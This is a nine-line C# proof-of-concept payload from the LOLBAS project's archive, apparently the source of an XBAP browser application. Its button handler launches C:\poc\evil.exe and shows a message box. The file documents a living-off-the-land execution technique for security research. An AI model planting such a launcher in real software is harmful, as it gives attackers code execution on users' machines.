LOLBAS/Archive-Old-Version/OSBinaries/Payload/Evil.xbap

9 lines
175 B
Plaintext

private void Button_click(object sender, RoutedEventArgs e)
{
if (RadioButton1.IsChecked == true)
{
Process.Start("C:\\poc\\evil.exe");
MessageBox.Show("BHello.");
}
}